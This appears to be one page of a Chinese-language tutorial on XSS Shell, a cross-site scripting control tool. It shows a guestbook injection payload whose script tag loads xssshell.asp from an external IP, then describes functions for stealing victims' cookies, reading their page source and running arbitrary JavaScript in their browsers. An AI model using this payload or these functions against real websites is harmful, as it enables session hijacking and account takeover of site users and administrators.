|
留言内容里的代码看来被执行了哦(没有任何显示)。这里我发现一个现象,比如我提交了一个含有“<script src="http:// 125.71.*.*/xssshell.asp?v=336699"></script>”的留言,如果我再提交一个,则上次提交的留言会被覆盖或是被删除。我尝试了几个ASP系统都是如此,如果重复使用这句代码,甚至会把对方的系统搞乱!
功能演示
如图5所示,画线的框内都是XSS Shell可以执行的功能。下面我们对其进行一一说明。
1)getCookie()
这个功能用于获取Cookie,单击它后如图6所示,会显示目标的Cookie(Logs跑到下面了)。这个功能还是很有用的,比如以前的动网前台提权漏洞就需要先获得管理员的Cookie。
2)getSelfHtml()
这个功能用于获取用户当前的网页源代码,很简单,大家试用一下就知道了。
3)alert(<message>)
这个功能一看就知道是向对方发送消息的。它利用的是Alert函数,所以对方接收到的消息是以提示框的形式显示的,如图7所示。输入消息的内容在管理页的参数框内写入,如图8所示。
4)eval(<javascript code>)
这个功能可以在受害者的浏览器里执行任意脚本,内容也是在图8的参数框里输入。比如输入javascript:alert("dd")后点击“eval(<javascript code>)”链接,就会在受害者那边弹出窗口。
5)prompt(<question>)
这个功能就比较好玩了。在参数框中输入内容(如你爱我吗?)后执行,在受害者的浏览器中会有如图9所示的提示。在Logs中,我们还可以看到对方的回答,如图10所示。
上一页 1 2 3 下一页 | 
安全中国首页 > 文章中心 > 跨站技术文章